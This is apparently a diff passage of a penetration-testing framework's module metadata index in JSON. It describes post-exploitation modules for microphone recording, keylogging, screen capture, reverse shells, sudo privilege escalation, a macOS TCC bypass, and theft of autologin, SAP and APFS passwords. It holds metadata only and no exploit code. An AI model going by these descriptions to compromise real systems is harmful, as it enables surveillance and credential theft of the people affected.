+ ], + "description": "This module will broadcast a YouTube video on specified compromised systems. It will play\n the video in the target machine's native browser. 
The VID datastore option is the \"v\"\n parameter in a YouTube video's URL.\n\n Enabling the EMBED option will play the video in full screen mode through a clean interface\n but is not compatible with all videos.\n\n This module will create a custom profile for Firefox on Linux systems in the /tmp directory.", + "references": [], + "platform": "Android,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/play_youtube.rb", + "is_install_path": true, + "ref_name": "multi/manage/play_youtube", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "audio-effects", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/record_mic": { + "name": "Multi Manage Record Microphone", + "fullname": "post/multi/manage/record_mic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will enable and record your target's microphone.\n For non-Windows targets, please use Java meterpreter to be\n able to use this feature.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/record_mic.rb", + "is_install_path": true, + "ref_name": "multi/manage/record_mic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"post_multi/manage/screensaver": { + "name": "Multi Manage the screensaver of the target computer", + "fullname": "post/multi/manage/screensaver", + "aliases": [], + "rank": 600, + "disclosure_date": null, + "type": "post", + "author": [ + "Eliott Teissonniere", + "Julien Voisin" + ], + "description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.", + "references": [ + "URL-https://gitlab.gnome.org/GNOME/gnome-shell/-/issues/7530" + ], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/manage/screensaver.rb", + "is_install_path": true, + "ref_name": "multi/manage/screensaver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LOCK", + "description": "Lock the current session" + }, + { + "name": "START", + "description": "Start the screensaver, may lock the current session" + }, + { + "name": "STOP", + "description": "Stop the screensaver, user may be prompted for its password" + }, + { + "name": "UNLOCK", + "description": "Unlock the current session" + } + ] + }, + "post_multi/manage/screenshare": { + "name": "Multi Manage the screen of the target meterpreter session", + "fullname": "post/multi/manage/screenshare", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module allows you to view and control the screen of the target computer via\n a local browser window. 
The module continually screenshots the target screen and\n also relays all mouse and keyboard events to session.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-09-23 15:03:19 +0000", + "path": "/modules/post/multi/manage/screenshare.rb", + "is_install_path": true, + "ref_name": "multi/manage/screenshare", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/set_wallpaper": { + "name": "Multi Manage Set Wallpaper", + "fullname": "post/multi/manage/set_wallpaper", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module will set the desktop wallpaper background on the specified session.\n The method of setting the wallpaper depends on the platform type.", + "references": [], + "platform": "Android,Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/set_wallpaper.rb", + "is_install_path": true, + "ref_name": "multi/manage/set_wallpaper", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/shell_to_meterpreter": { + "name": "Shell to Meterpreter Upgrade", + "fullname": "post/multi/manage/shell_to_meterpreter", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tom Sellers " + ], + "description": 
"This module attempts to upgrade a command shell to meterpreter. The shell\n platform is automatically detected and the best version of meterpreter for\n the target is selected. Currently meterpreter/reverse_tcp is used on Windows\n and Linux, with 'python/meterpreter/reverse_tcp' used on all others.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/shell_to_meterpreter.rb", + "is_install_path": true, + "ref_name": "multi/manage/shell_to_meterpreter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/sudo": { + "name": "Multiple Linux / Unix Post Sudo Upgrade Shell", + "fullname": "post/multi/manage/sudo", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "todb ", + "Ryan Baxendale " + ], + "description": "This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. 
This technique relies on sudo\n versions from 2008 and later which support -A.", + "references": [ + "URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h" + ], + "platform": "AIX,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/sudo.rb", + "is_install_path": true, + "ref_name": "multi/manage/sudo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs", + "account-lockouts" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_multi/manage/system_session": { + "name": "Multi Manage System Remote TCP Shell Session", + "fullname": "post/multi/manage/system_session", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will create a Reverse TCP Shell on the target system\n using the system's own scripting environments installed on the\n target.", + "references": [], + "platform": "Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/system_session.rb", + "is_install_path": true, + "ref_name": "multi/manage/system_session", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/upload_exec": { + "name": "Upload and Execute", + "fullname": "post/multi/manage/upload_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + 
"author": [ + "egypt " + ], + "description": "Push a file and execute it.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/upload_exec.rb", + "is_install_path": true, + "ref_name": "multi/manage/upload_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_multi/manage/zip": { + "name": "Multi Manage File Compressor", + "fullname": "post/multi/manage/zip", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module zips a file or a directory. On Linux, it uses the zip command.\n On Windows, it will try to use remote target's 7Zip if found. 
If not, it falls\n back to its Windows Scripting Host.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/zip.rb", + "is_install_path": true, + "ref_name": "multi/manage/zip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/local_exploit_suggester": { + "name": "Multi Recon Local Exploit Suggester", + "fullname": "post/multi/recon/local_exploit_suggester", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r ", + "Mo" + ], + "description": "This module suggests local Metasploit exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.", + "references": [], + "platform": "AIX,Android,Apple_iOS,Arista,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Mikrotik,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/recon/local_exploit_suggester.rb", + "is_install_path": true, + "ref_name": "multi/recon/local_exploit_suggester", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": 
[ + "service-resource-loss" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/multiport_egress_traffic": { + "name": "Generate TCP/UDP Outbound Traffic On Multiple Ports", + "fullname": "post/multi/recon/multiport_egress_traffic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module generates TCP or UDP traffic across a\n sequence of ports, and is useful for finding firewall\n holes and egress filtering. It only generates traffic\n on the port range you specify. It is up to you to\n run a responder or packet capture tool on a remote\n endpoint to determine which ports are open.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/recon/multiport_egress_traffic.rb", + "is_install_path": true, + "ref_name": "multi/recon/multiport_egress_traffic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/reverse_lookup": { + "name": "Reverse Lookup IP Addresses", + "fullname": "post/multi/recon/reverse_lookup", + "aliases": [ + "post/windows/gather/reverse_lookup", + "post/windows/recon/resolve_ip" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module reverse resolves an IP address or IP address range to hostnames.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": 
null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-05 13:18:35 +0000", + "path": "/modules/post/multi/recon/reverse_lookup.rb", + "is_install_path": true, + "ref_name": "multi/recon/reverse_lookup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/recon/sudo_commands": { + "name": "Sudo Commands", + "fullname": "post/multi/recon/sudo_commands", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module examines the sudoers configuration for the session user\n and lists the commands executable via sudo.\n\n This module also inspects each command and reports potential avenues\n for privileged code execution due to poor file system permissions or\n permitting execution of executables known to be useful for privesc,\n such as utilities designed for file read/write, user modification,\n or execution of arbitrary operating system commands.\n\n Note, you may need to provide the password for the session user.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/recon/sudo_commands.rb", + "is_install_path": true, + "ref_name": "multi/recon/sudo_commands", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/sap/smdagent_get_properties": { + "name": "Diagnostics 
Agent in Solution Manager, stores unencrypted credentials for Solution Manager server", + "fullname": "post/multi/sap/smdagent_get_properties", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Yvan Genuer", + "Vladimir Ivanov" + ], + "description": "This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials\n used by the SMDAgent to connect to the SAP Solution Manager server.", + "references": [ + "CVE-2019-0307", + "URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf" + ], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/sap/smdagent_get_properties.rb", + "is_install_path": true, + "ref_name": "multi/sap/smdagent_get_properties", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_brocade": { + "name": "Brocade Gather Device General Information", + "fullname": "post/networking/gather/enum_brocade", + "aliases": [ + "post/brocade/gather/enum_brocade" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects Brocade device information and configuration.\n This module has been tested against an icx6430 running 08.0.20T311.", + "references": [], + "platform": "Brocade", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:13:25 +0000", + "path": "/modules/post/networking/gather/enum_brocade.rb", 
+ "is_install_path": true, + "ref_name": "networking/gather/enum_brocade", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_cisco": { + "name": "Cisco Gather Device General Information", + "fullname": "post/networking/gather/enum_cisco", + "aliases": [ + "post/cisco/gather/enum_cisco" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module collects a Cisco IOS or NXOS device information and configuration.", + "references": [], + "platform": "Cisco", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_cisco.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_cisco", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_f5": { + "name": "F5 Gather Device General Information", + "fullname": "post/networking/gather/enum_f5", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects a F5's device information and configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_f5.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_f5", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_juniper": { + "name": "Juniper Gather Device General Information", + "fullname": "post/networking/gather/enum_juniper", + "aliases": [ + "post/juniper/gather/enum_juniper" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects a Juniper ScreenOS and JunOS device information and configuration.", + "references": [], + "platform": "Juniper", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 02:13:25 +0000", + "path": "/modules/post/networking/gather/enum_juniper.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_juniper", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_mikrotik": { + "name": "Mikrotik Gather Device General Information", + "fullname": "post/networking/gather/enum_mikrotik", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects Mikrotik device information and configuration.\n This module has been tested against RouterOS 6.45.9.", + "references": [], + "platform": "Mikrotik", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_mikrotik.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_mikrotik", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_networking/gather/enum_vyos": { + "name": "VyOS Gather Device General Information", + "fullname": "post/networking/gather/enum_vyos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module collects VyOS device information and configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/networking/gather/enum_vyos.rb", + "is_install_path": true, + "ref_name": "networking/gather/enum_vyos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/admin/say": { + "name": "OS X Text to Speech Utility", + "fullname": "post/osx/admin/say", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will speak whatever is in the 'TEXT' option on the victim machine.", + "references": [ + "URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/admin/say.rb", + "is_install_path": true, + "ref_name": "osx/admin/say", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ 
+ "crash-safe" + ], + "SideEffects": [ + "audio-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/capture/keylog_recorder": { + "name": "OSX Capture Userspace Keylogger", + "fullname": "post/osx/capture/keylog_recorder", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/capture/keylog_recorder.rb", + "is_install_path": true, + "ref_name": "osx/capture/keylog_recorder", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/capture/screen": { + "name": "OSX Screen Capture", + "fullname": "post/osx/capture/screen", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Peter Toth " + ], + "description": "This module takes screenshots of target desktop and automatically downloads them.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/capture/screen.rb", + "is_install_path": true, + "ref_name": 
"osx/capture/screen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/escalate/tccbypass": { + "name": "Bypass the macOS TCC Framework", + "fullname": "post/osx/escalate/tccbypass", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mattshockl", + "timwr" + ], + "description": "This module exploits a vulnerability in the TCC daemon on macOS Catalina\n (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be\n manipulated (by setting the HOME environment variable) to use a new user\n controlled location as the TCC database. We can then grant ourselves\n entitlements by inserting them into this new database.", + "references": [ + "CVE-2020-9934", + "URL-https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8", + "URL-https://github.com/mattshockl/CVE-2020-9934" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/osx/escalate/tccbypass.rb", + "is_install_path": true, + "ref_name": "osx/escalate/tccbypass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/apfs_encrypted_volume_passwd": { + "name": "Mac OS X APFS Encrypted Volume Password Disclosure", + "fullname": "post/osx/gather/apfs_encrypted_volume_passwd", + "aliases": [], + "rank": 300, + 
"disclosure_date": "2018-03-21", + "type": "post", + "author": [ + "Sarah Edwards", + "cbrnrd" + ], + "description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.", + "references": [ + "URL-https://thehackernews.com/2018/03/macos-apfs-password.html", + "URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp" + ], + "platform": "OSX", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb", + "is_install_path": true, + "ref_name": "osx/gather/apfs_encrypted_volume_passwd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/autologin_password": { + "name": "OSX Gather Autologin Password as Root", + "fullname": "post/osx/gather/autologin_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. 
Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.", + "references": [ + "URL-https://web.archive.org/web/20180408062145/http://www.brock-family.org/gavin/perl/kcpassword.html" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/autologin_password.rb", + "is_install_path": true, + "ref_name": "osx/gather/autologin_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/enum_adium": { + "name": "OS X Gather Adium Enumeration", + "fullname": "post/osx/gather/enum_adium", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. 
To loot both account\n plists and chat logs, simply set the action to 'ALL'.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_adium.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_adium", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ACCOUNTS", + "description": "Collect account-related plists" + }, + { + "name": "ALL", + "description": "Collect both account plists and chat logs" + }, + { + "name": "CHATS", + "description": "Collect chat logs with a pattern" + } + ] + }, + "post_osx/gather/enum_airport": { + "name": "OS X Gather Airport Wireless Preferences", + "fullname": "post/osx/gather/enum_airport", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will download OS X Airport Wireless preferences from the victim\n machine. 
The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_airport.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_airport", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/enum_chicken_vnc_profile": { + "name": "OS X Gather Chicken of the VNC Profile", + "fullname": "post/osx/gather/enum_chicken_vnc_profile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_chicken_vnc_profile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + 